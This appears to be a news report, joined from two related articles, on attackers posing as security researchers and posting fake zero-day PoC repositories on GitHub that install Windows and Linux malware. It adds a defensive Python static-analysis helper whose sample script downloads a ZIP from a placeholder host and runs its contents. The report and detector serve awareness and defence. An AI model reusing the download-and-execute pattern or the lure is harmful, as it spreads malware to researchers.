Fake zero-day PoC exploits on GitHub push Windows, Linux malware


Hackers are impersonating cybersecurity researchers on Twitter and GitHub to publish fake proof-of-concept exploits for zero-day vulnerabilities that infect Windows and Linux with malware.

These malicious exploits are promoted by alleged researchers at a fake cybersecurity company named 'High Sierra Cyber Security,' who promote the GitHub repositories on Twitter, likely to target cybersecurity researchers and firms involved in vulnerability research.

The repositories appear legitimate, and the users who maintain them impersonate real security researchers from Rapid7 and other security firms, even using their headshots.

The same personas maintain accounts on Twitter to help add legitimacy to their research and the code repositories like GitHub, as well as draw victims from the social media platform.

This campaign was discovered by VulnCheck, who reports that it has been underway since at least May 2023, promoting supposed exploits for zero-day flaws in popular software like Chrome, Discord, Signal, WhatsApp, and Microsoft Exchange.

In all cases, the malicious repositories host a Python script ('poc.py') that acts as a malware downloader for Linux and Windows systems.

The script downloads a ZIP archive from an external URL to the victim's computer depending on their operating system, with Linux users downloading 'cveslinux.zip' and Windows users receiving 'cveswindows.zip.'

The malware is saved to the Windows %Temp% or the Linux /home/<username>/.local/share folders, extracted, and executed.

VulnCheck reports that the Windows binary contained in the ZIP ('cves_windows.exe') is flagged by over 60% of AV engines on VirusTotal. The Linux binary ('cves_linux') is much more stealthy, only caught by three scanners.
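The download, extract and execute pattern described for 'poc.py' can be spotted before a PoC is ever run. The following is an added example, not part of the original posts or of VulnCheck's report: a static triage helper that parses a script with Python's `ast` module and reports the lines where it branches on the OS, downloads, unpacks and launches files. The indicator list, the `SAMPLE` script and its placeholder URL are constructed for illustration.

```python
import ast

INDICATORS = {  # heuristic names chosen for this example, not exhaustive
    "os_branch": {"platform.system", "os.name", "sys.platform"},
    "download": {"urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get"},
    "extract": {"zipfile.ZipFile", "shutil.unpack_archive"},
    "execute": {"subprocess.Popen", "subprocess.run", "os.system", "os.popen"},
}

def import_aliases(tree):
    """Map local names to the dotted names they were imported as."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            aliases.update({a.asname: a.name for a in node.names if a.asname})
        elif isinstance(node, ast.ImportFrom) and node.module:
            aliases.update({a.asname or a.name: f"{node.module}.{a.name}" for a in node.names})
    return aliases

def dotted(node, aliases):
    """Resolve a Name/Attribute chain to 'pkg.mod.func'; None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        return ".".join([aliases.get(node.id, node.id)] + parts[::-1])

def triage(source):
    """Return {behaviour: [line numbers]} by parsing only; nothing is executed."""
    tree = ast.parse(source)
    aliases, hits = import_aliases(tree), {}
    for node in ast.walk(tree):
        if isinstance(node, (ast.Attribute, ast.Name)):
            name = dotted(node, aliases)
            for behaviour, names in INDICATORS.items():
                if name in names:
                    hits.setdefault(behaviour, set()).add(node.lineno)
    return {b: sorted(lines) for b, lines in hits.items()}

# Constructed sample mirroring the behaviour described above (placeholder URL and names).
SAMPLE = '''\
import platform, subprocess, zipfile
from urllib.request import urlretrieve
name = "win.zip" if platform.system() == "Windows" else "linux.zip"
urlretrieve("https://example.invalid/" + name, name)
zipfile.ZipFile(name).extractall("out")
subprocess.Popen(["out/run"])
'''
```

A script that hits `download` and `execute` together deserves a manual read before anything else. An empty result proves nothing, since dynamic imports, `exec` and encoded strings evade this kind of name matching.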


A GitHub user managed to dupe security researchers by publishing fake proofs-of-concept (PoCs) containing Linux backdoors.

Cybersecurity researchers use PoCs to test and better understand publicly known vulnerabilities. They are essential and ubiquitous which, perhaps, makes it easier for a bad one to slip through. Researchers from Uptycs this week outed a GitHub user (now deactivated) who copied legitimate PoCs for known vulnerabilities, reposting them with hidden Linux-built infostealing malware. One of the two fake PoCs had already been forked 25 times at the time of discovery; a second copy has been forked 20 times.

Neoteric as PoC poisoning may be, hackers have been known to impersonate researchers before. They might do it just to prove that they can, or to learn more about their adversaries. Or, Malladi posits, they might want to steal researchers' powerful software tools.

Meanwhile, there's not much that repositories can do to prevent this particular brand of phishing, even when a fake PoC obviously overlaps with a legitimate one. Malladi posits a hypothetical college course, where beginner students are assigned to code a "hello, world" program in Python, then publish it to GitHub. The same code could be published by dozens of new accounts, "but what can they do? It is a legit thing. That's the problem — even if copying can be detected, the admins cannot do anything about it." And so, cybersecurity professionals are going to have to walk the walk — engaging with cyberspace with the same caution and preparedness they expect of their clients, by always testing in a virtual environment.
